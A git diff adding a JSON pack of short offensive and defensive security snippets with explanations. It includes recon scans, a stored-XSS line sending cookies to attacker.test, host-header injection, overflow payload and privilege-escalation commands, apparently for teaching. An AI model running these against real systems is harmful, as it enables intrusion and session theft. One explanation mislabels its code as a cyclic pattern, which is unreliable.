diff options
Diffstat (limited to 'data')
| -rw-r--r-- | data/packs/hacking.json | 24 |
1 files changed, 24 insertions, 0 deletions
diff --git a/data/packs/hacking.json b/data/packs/hacking.json new file mode 100644 index 0000000..471c8d0 --- /dev/null +++ b/data/packs/hacking.json @@ -0,0 +1,24 @@ +[ + {"category":"hacking","language":"shell","attribution":"Recon","explanation":"A TCP SYN scan of the top 1000 ports. -sV asks each open port for its service banner, which is what turns a port list into a target list.","content":"nmap -sS -sV -T4 --top-ports 1000 10.0.0.0/24"}, + {"category":"hacking","language":"shell","attribution":"Recon","explanation":"Resolves a wordlist of names against a domain. Subdomains are where forgotten staging boxes live.","content":"gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt -t 40"}, + {"category":"hacking","language":"shell","attribution":"Recon","explanation":"Pulls every unique path a site references from its own JavaScript. Endpoints that no link points at are still endpoints.","content":"curl -s https://target/app.js | grep -oE '\"/[a-zA-Z0-9_/-]+\"' | sort -u"}, + {"category":"hacking","language":"shell","attribution":"Web","attribution_note":"","explanation":"Directory brute force. -x tries extensions, so index.php.bak and config.old surface alongside directories.","content":"ffuf -u https://target/FUZZ -w wordlist.txt -e .php,.bak,.old -mc 200,301,403"}, + {"category":"hacking","language":"shell","attribution":"Web","explanation":"Requests a path with an absolute URL to see whether the proxy in front trusts it. A different response here often means an internal service is reachable.","content":"curl -s -o /dev/null -w '%{http_code}' 'https://target/@internal/admin'"}, + {"category":"hacking","language":"shell","attribution":"Web","explanation":"A header the application echoes back into a redirect or a password-reset link is a host header injection.","content":"curl -H 'X-Forwarded-Host: attacker.test' -s https://target/reset | grep -i location"}, + {"category":"hacking","language":"clike","attribution":"Memory safety","explanation":"The classic overflow: strcpy writes until it finds a NUL, buf holds 64 bytes, and nothing checks which is larger.","content":"char buf[64]; strcpy(buf, argv[1]); /* no bound - argv[1] decides the write length */"}, + {"category":"hacking","language":"clike","attribution":"Memory safety","explanation":"Freed then used. The allocator may hand that block to something else between the two lines, so the write lands in another object.","content":"free(ptr); ptr->next = head; /* use after free: the block may belong to someone else now */"}, + {"category":"hacking","language":"clike","attribution":"Memory safety","explanation":"An attacker-controlled format string. Every %x walks the stack; %n writes to it.","content":"printf(user_input); /* format string bug - should be printf(\"%s\", user_input) */"}, + {"category":"hacking","language":"python","attribution":"Exploit dev","explanation":"A cyclic pattern. Whatever four bytes end up in the instruction pointer tell you the exact offset to the return address.","content":"payload = b'A' * 72 + p64(0x401196) + p64(win_addr)"}, + {"category":"hacking","language":"python","attribution":"Exploit dev","explanation":"Leaks a libc address from the GOT, then rebases every other libc symbol off it. This is how ASLR is worked around rather than defeated.","content":"libc.address = leak - libc.symbols['puts']"}, + {"category":"hacking","language":"shell","attribution":"Crypto","explanation":"An MD5 of a known-weak hash type. Modern password hashing exists because this takes seconds, not years.","content":"hashcat -m 0 -a 0 hashes.txt rockyou.txt --force"}, + {"category":"hacking","language":"shell","attribution":"Crypto","explanation":"Reads the certificate a host presents. Expiry dates and hostname mismatches are found here, not in a browser warning.","content":"openssl s_client -connect target:443 -servername target < /dev/null | openssl x509 -noout -text"}, + {"category":"hacking","language":"shell","attribution":"Post-exploitation","explanation":"Finds setuid binaries. Anything unusual here runs as its owner no matter who executes it.","content":"find / -perm -4000 -type f 2>/dev/null"}, + {"category":"hacking","language":"shell","attribution":"Post-exploitation","explanation":"Lists what the current user may run as root. A single entry with NOPASSWD is often the whole path to root.","content":"sudo -l 2>/dev/null | grep -E 'NOPASSWD|\\(ALL\\)'"}, + {"category":"hacking","language":"shell","attribution":"Post-exploitation","explanation":"Upgrades a dumb shell to a real TTY, so job control, tab completion and su all start working.","content":"python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"}, + {"category":"hacking","language":"javascript","attribution":"Web","explanation":"A stored XSS payload that steals a session. HttpOnly on the cookie is what stops this line reading it.","content":"fetch('//attacker.test/?c=' + encodeURIComponent(document.cookie))"}, + {"category":"hacking","language":"javascript","attribution":"Web","explanation":"Prototype pollution: writing through __proto__ reaches every object that inherits from it.","content":"JSON.parse('{\"__proto__\": {\"isAdmin\": true}}')"}, + {"category":"hacking","language":"shell","attribution":"Defence","explanation":"Blocks everything inbound by default and allows what is needed back. A deny-by-default policy is the only kind worth writing.","content":"iptables -P INPUT DROP && iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"}, + {"category":"hacking","language":"shell","attribution":"Defence","explanation":"Watches authentication failures as they happen. Most intrusions are visible in logs long before they are noticed.","content":"journalctl -u sshd -f | grep -Ei 'failed|invalid user'"}, + {"category":"hacking","language":"shell","attribution":"Defence","explanation":"Compares installed files against the package manager's own checksums. A changed system binary shows up here.","content":"pacman -Qkk 2>&1 | grep -v ' 0 altered files'"}, + {"category":"hacking","language":"python","attribution":"Defence","explanation":"Constant-time comparison. A plain == returns early on the first differing byte, which leaks the answer through timing.","content":"if not hmac.compare_digest(expected_sig, provided_sig): raise ValueError('bad signature')"} +] |